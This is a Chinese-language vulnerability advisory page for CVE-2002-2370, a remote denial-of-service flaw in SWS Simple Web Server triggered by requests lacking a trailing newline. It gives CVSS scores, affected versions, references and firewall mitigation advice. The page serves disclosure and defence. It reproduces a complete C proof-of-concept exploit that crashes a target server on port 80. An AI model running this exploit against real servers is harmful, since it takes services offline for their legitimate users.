CVE-2002-2370
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:33:02
NMCOE    

[原文]SWS web server 0.0.4, 0.0.3 and 0.1.0 allows remote attackers to cause a denial of service (crash) via a URL request that does not end with a newline.


[CNNVD]SWS Simple Web Server处理无换行符请求远程拒绝服务攻击漏洞(CNNVD-200212-718)

        
        Simple Web Server是一款小型的WEB服务程序。
        Simple Web Server对换行符处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        Simple Web Server在处理没有以换行符结尾的请求时可导致服务崩溃,远程攻击者可以利用这个问题进行拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sws:sws_simple_web_server:0.0.3
cpe:/a:sws:sws_simple_web_server:0.1.0
cpe:/a:sws:sws_simple_web_server:0.0.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2370
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2370
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-718
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5664
(PATCH)  BID  5664
http://www.iss.net/security_center/static/10005.php
(UNKNOWN)  XF  sws-webserver-newline-dos(10005)
http://archives.neohapsis.com/archives/bugtraq/2002-09/0011.html
(UNKNOWN)  BUGTRAQ  20020902 SWS Web Server v0.1.0 Exploit

- 漏洞信息

SWS Simple Web Server处理无换行符请求远程拒绝服务攻击漏洞
中危 设计错误
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        
        Simple Web Server是一款小型的WEB服务程序。
        Simple Web Server对换行符处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
        Simple Web Server在处理没有以换行符结尾的请求时可导致服务崩溃,远程攻击者可以利用这个问题进行拒绝服务攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时使用防火墙限制访问SWS Simple Web Server,只允许可信IP连接。
        厂商补丁:
        SWS
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.linuxprogramlama.com/

- 漏洞信息 (21775)

SWS Simple Web Server 0.0.3/0.0.4/0.1 New Line Denial Of Service Vulnerability (EDBID:21775)
linux dos
2002-09-02 Verified
0 saman
N/A [点击下载]
source: http://www.securityfocus.com/bid/5664/info

SWS Simple Web Server is prone to a denial of service when requests not ending with a newline are received.

Remote attackers may exploit this condition to deny access to legitimate users of the web server. 

/*
 * Mon Sep  2 17:45:04 2002
 *
 * |SaMaN| aka Mert <saman@hush.com>
 *
 * Information  : Anyone can kill SWS Web Server v0.1.0 remotely.
 *
 * Proof of Concept Exploit for SWS Web Server v0.1.0
 *
 * SWS homepage : http://www.linuxprogramlama.com
 *
 * Tested on    : Slackware 8.1 - 2.4.18
 *              : Redhat 7.0    - 2.2.16-22
 *
 * Problem      : sws_web_server.c
 *              : line 108
 *              : if (recvBuffer[i - 1] != '\n') break;
 *
 * Q : So what will happen when we send a string not end with '\n' ?
 * A : break break break
 * Q : So root should restart web server everytime ?
 * A : Yes
 * Q : Other web servers act like this ?
 * A : No
 * Q : So something is wrong ?
 * A : Yes :)
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define K  "\033[1;31m"
#define Y  "\033[1;32m"
#define SA "\033[1;33m"
#define M  "\033[1;34m"

#define PORT 80

int main(int argc, char *argv[])
{
   int sockfd, numbytes;
   struct hostent *adres;
   struct sockaddr_in hedef;

   char buf[8] = "|SaMaN|";

   if (argc != 2) {
      printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
      printf("%sSWS Web Killer (saman@hush.com)  \n", SA);
      printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
      printf("%sUsage: ./sws_web_killer %s<IP>   \n",Y,M);
      return 0;
   }

   if ((adres=gethostbyname(argv[1])) == NULL) {
      perror("gethostbyname");
      exit(1);
   }

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("socket");
      exit(1);
   }

   hedef.sin_family = AF_INET;
   hedef.sin_port = htons(PORT);
   hedef.sin_addr = *((struct in_addr *)adres->h_addr);
   memset(&(hedef.sin_zero), '\0', 8);

   if (connect(sockfd, (struct sockaddr *)&hedef,
                                     sizeof(struct sockaddr)) == -1)
   {
        perror("connect");
        exit(1);
   }

   if ((numbytes=send(sockfd, buf, strlen(buf), 0)) == -1) {
        perror("send");
        exit(1);
   }

   close(sockfd);

   return 0;
}
		

- 漏洞信息

55111
SWS Web Server Unfinished Line Remote DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2002-09-02 Unknow
2002-09-02 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站